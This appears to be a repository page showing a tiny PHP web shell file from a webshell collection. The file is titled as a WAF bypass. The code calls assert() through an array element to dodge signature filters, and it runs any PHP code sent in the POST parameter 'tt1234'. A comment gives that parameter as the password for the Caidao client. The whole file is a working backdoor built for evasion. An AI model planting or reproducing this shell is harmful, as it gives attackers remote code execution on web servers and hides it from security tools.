webshell/php/pass-waf-2014-10-19.php

5 lines
117 B
PHP
Raw Normal View History

2014-10-20 00:27:05 +00:00
<?php
$item['tt'] = 'assert';
$array[] = $item;
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
?>